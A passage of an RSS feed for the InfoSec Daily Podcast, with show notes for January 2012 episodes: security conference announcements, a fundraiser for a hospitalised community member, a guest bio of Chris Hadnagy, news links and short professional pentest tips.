	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open! </span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Chris Hadnagy, aka loganWHD, has been involved with computers and technology for over 14 years. Presently his focus is on the &quot;human&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">aspect of technology such as social engineering and physical security. Chris has spent time in providing training in many topics around the globe and also has had many articles published in local, national and international magazines and journals.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Chris was a student of Paul Ekman&#39;s training classes on Microexpressions and has spent time learning and educating others on the values of nonverbal communications. He has combined what he learned with years of experience in a new research he has called Neuro Linguistic Hacking(NLH) that combines nonverbal communications as well as the principles of the controversial study on NLP to influence other peoples emotions.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He is also the lead developer of Social-Engineer.Org as well as a the author of the best-selling, Social Engineering: The Art of Human Hacking.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-563-interview-with-chris-hadnagy-humanhacker/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3348/0/infosec-daily-podcast-episode-563.mp3" length="32753725" type="audio/mpeg" />
		<itunes:duration>1:08:11</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 563 for January 9, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.
	&#160;
Announcements:
Information Security Blogger Awards[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 563 for January 9, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	On &#160;a somewhat related note, Mubix launched a poll to see which podcasts everyone is listening to. &#160;Go to http://twtpoll.com/jlknm0 to take the poll.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012 
	Where: Seattle, Washington
	When: July 21-24, 2012 
	Where: Black Hat Vegas
	When: August 20-24, 2012 
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012 
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open! 

	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Chris Hadnagy, aka loganWHD, has been involved with computers and technology for over 14 years. Presently his focus is on the &#34;human&#34;
	aspect of technology such as social engineering and physical security. Chris has spent time in providing training in many topics around the globe and also has had many articles published in local, national and international magazines and journals.

	Chris was a student of Paul Ekman&#39;s training classes on Microexpressions and has spent time learning and educating others on the values of nonverbal commun[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 562 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-562-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-562-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 08 Jan 2012 03:02:15 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3346</guid>
		<description><![CDATA[&#160; Episode 562 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 562 for January 7, 2012. &#160;Tonight&#039;s podcast is hosted by Dr bonez. Guests: Hackett, brew_ninja, oncee, and spridel. Announcements: Information Security Blogger Awards 2012 Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<div style="background-color: transparent"><b><span>Episode 562 &#8211; Weekend Wrap-up with Dr. b0n3z</span><br />
	<span>InfoSec Daily Podcast Episode 562 for January 7, 2012. &nbsp;</span><span>Tonight&#039;s podcast is hosted by Dr bonez.</span></p>
<p>	<span>Guests: Hackett, brew_ninja, oncee, and spridel.</span></p>
<p>	</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Announcements:</span></b></p>
<p>	<b><span>Information Security Blogger Awards 2012</span><br />
	<span>Since we were over looked again for the Best Podcast on Security </span><span>you can email </span><a href="mailto:ashimmy@hotmail.com"><span>ashimmy@hotmail.com</span></a><span> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span>www.ashimmy.com</span></a><span>.</span></p>
<p>	<span>Brad Smith (theNurse)</span><br />
	<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span>NOVA Hackers Open House</span><br />
	<span>When: January 9th, 2012 at 6:00PM</span><br />
	<span>Where: ICF International, 9300 Lee Highway, Fairfax, VA</span><br />
	<a href="http://maps.google.com/maps/ms?hl=en&amp;gl=us&amp;ptab=2&amp;ie=UTF8&amp;oe=UTF8&amp;msa=0&amp;msid=104405866946229741710.00048046ec622944cab00&amp;ll=38.871786,-77.265805&amp;spn=0.003968,0.006614&amp;t=h&amp;z=18"><span>http://maps.google.com/maps/ms?hl=en&amp;gl=us&amp;ptab=2&amp;ie=UTF8&amp;oe=UTF8&amp;msa=0&amp;msid=104405866946229741710.00048046ec622944cab00&amp;ll=38.871786,-77.265805&amp;spn=0.003968,0.006614&amp;t=h&amp;z=18</span></a></p>
<p>	<span>CampusCon 2012</span><br />
	<span>When: January 21, 2012</span><br />
	<span>Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span>http://campuscon.hackingwit.com</span></a><br />
	<span>(from Baconzombie)</span></p>
<p>
	<span>New England InfoSec Tweetup</span><br />
	<span>When: January 21, 2012</span><br />
	<span>Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span>http://neistu3.eventbrite.com/</span></a></p>
<p>	<span>SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span>When: Starts January 24, 2012</span><br />
	<span>Where: Atlanta, GA</span><br />
	<span>Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span>http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span>ShmooCon 2012</span><br />
	<span>When: January 27th-29th, 2012</span><br />
	<span>Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span>http://www.shmoocon.org</span></a></p>
<p>	<span>Schmoocon Epilogue</span><br />
	<span>When: After Schmoocon</span><br />
	<span>Where: Washington, DC</span><br />
	<span>Hit up anyone in NOVA Hackers</span></p>
<p>	<span>Metasploit Framework Unleashed Cincinnati</span><br />
	<span>When: February 11, 2012. </span><br />
	<span>Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span>https://msfucincy.wordpress.com/</span></a><br />
	<span>$20 donation for #HFC</span></p>
<p>	<span>Social Engineering Training</span><br />
	<span>When: March 5-9 <br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span>When: April 9-13 <br class="kix-line-break" /><br />
	Where: Bristol, UK</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span>InfoSec Southwest</span><br />
	<span>When: March 31-April 1</span><br />
	<span>CFP Closes: Feb 1st</span><br />
	<span>Where: Austin, Texas</span><br />
	<a href="http://infosecsouthwest.com/"><span>http://infosecsouthwest.com/</span></a><br />
	<span>Peiter &ldquo;Mudge&rdquo; Zatko is the Keynote</span></p>
<p>	<span>Linuxfest Northwest 2012</span><br />
	<span>When: Saturday, April 28th-29th, 2012</span><br />
	<span>Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
	<span>CFP now open!</span></p>
<p>	<span>AIDE 2012</span><br />
	<span>When: May 21-25, 2012</span><br />
	<span>Where: Marshall University Forensic Science Center</span><br />
	<span>Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
	<span>CFP now open!</span></p>
<p>	<span>DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span>When: &nbsp;September 27-30, 2012</span><br />
	<span>Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></p>
<p>	<span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	</b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Stories</span></b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: &nbsp;</span><span>What are the InfoSec Daily Podcast members New Years Resolutions?</span></b></p>
<p>	<b><br />
	</b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://www.cyberwarnews.info/2012/01/06/one-of-the-sony-hackers-s3rver_exe-has-been-hacked/"><span>http://www.cyberwarnews.info/2012/01/06/one-of-the-sony-hackers-s3rver_exe-has-been-hacked/</span></a></b></p>
<p>	<b><br />
	</b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source:</span><span> </span><a href="http://arstechnica.com/business/news/2012/01/new-slow-motion-dos-attack-just-a-few-pcs-little-fear-of-detection.ars"><span>http://arstechnica.com/business/news/2012/01/new-slow-motion-dos-attack-just-a-few-pcs-little-fear-of-detection.ars</span></a></b></p>
<p>	<b><br />
	<span>Pentest Lessons:</span><br />
	<span>Adam Compton &amp; Zac Wagle&#039;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span>https://twitter.com/pentestlessons</span></a><span>.</span><br />
	<span>Lesson 1:</span><span> Know not only how to use the tool, but what the tool can/cannot do.</span><br />
	<span>Lesson 2:</span><span> ALWAYS read the Statement of Work (SOW) before you show-up on-site. &nbsp;</span><br />
	<span>Lesson 3: </span><span>Write down what you&#039;ve found, include the </span><span>how </span><span>and </span><span>when</span><span>* </span><br />
	<span>Lesson 4: </span><span>When you run an exploit, don&rsquo;t do it blindly. Always, always, know what the exploit does, and how it will affect the machine you&rsquo;re attacking. (deploying an &ldquo;agent&rdquo; means you`ve exploited the machine)</span><br />
	<span>* Very Important </span></p>
<p>	</b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://blog.trendmicro.com/mcdonalds-gift-card-spam-on-twitter"><span>http://blog.trendmicro.com/mcdonalds-gift-card-spam-on-twitter</span></a></b></p>
<p>	<b><br />
	</b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://www.infosecurity-magazine.com/view/23046/pastebin-shut-down-twice-in-a-week-by-ddos-attacks/"><span>http://www.infosecurity-magazine.com/view/23046/pastebin-shut-down-twice-in-a-week-by-ddos-attacks/</span></a></b></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-562-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3346/0/infosec-daily-podcast-episode-562.mp3" length="17334683" type="audio/mpeg" />
		<itunes:duration>0:36:07</itunes:duration>
		<itunes:subtitle>&#160;
Episode 562 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 562 for January 7, 2012. &#160;Tonight&#039;s podcast is hosted by Dr bonez.
	Guests: Hackett, brew_ninja, oncee, and spridel.
	
Announcements:
	Information Sec[...]</itunes:subtitle>
		<itunes:summary>&#160;
Episode 562 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 562 for January 7, 2012. &#160;Tonight&#039;s podcast is hosted by Dr bonez.
	Guests: Hackett, brew_ninja, oncee, and spridel.
	
Announcements:
	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	NOVA Hackers Open House
	When: January 9th, 2012 at 6:00PM
	Where: ICF International, 9300 Lee Highway, Fairfax, VA
	http://maps.google.com/maps/ms?hl=en&#38;gl=us&#38;ptab=2&#38;ie=UTF8&#38;oe=UTF8&#38;msa=0&#38;msid=104405866946229741710.00048046ec622944cab00&#38;ll=38.871786,-77.265805&#38;spn=0.003968,0.006614&#38;t=h&#38;z=18
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)

	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9 
	Where: Seattle, Washington
	When: April 9-13 
	Where: Bristol, UK
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 31-April 1
	CFP Closes: Feb 1st
	Where: Austin, Texas
	http://infosecsouthwest.com/
	Peiter &#8220;Mudge&#8221; Zatko is the Keynote
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: Marshall University Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	
Stories
Source: &#160;What are the InfoSec Daily Podcast members New Years Resolutions?
	
	
Source: http://www.cyberwarnews.info/2012/01/06/one-of-the-sony-hackers-s3rver_exe-has-been-hacked/
	
	
Source: http://arstechnica.com/business/news/2012/01/new-slow-motion-dos-attack-just-a-few-pcs-little-fear-of-det[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 561 &#8211; Saved by the Virus, Slurping Worm, Anatomy of a Skimmer Scam, Facebook, CISADA &amp; Symantec</title>
		<link>http://www.isdpodcast.com/episode-561-saved-by-the-virus-slurping-worm-anatomy-of-a-skimmer-scam-facebook-cisada-symantec</link>
		<comments>http://www.isdpodcast.com/episode-561-saved-by-the-virus-slurping-worm-anatomy-of-a-skimmer-scam-facebook-cisada-symantec#comments</comments>
		<pubDate>Sat, 07 Jan 2012 02:20:43 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3341</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 561 for January 6, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez. &#160; Announcements: Information Security Blogger Awards 2012 Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 561 for January 6, 2012. &nbsp;</span><span style="font-size:13px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.</span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NOVA Hackers Open House</span><br />
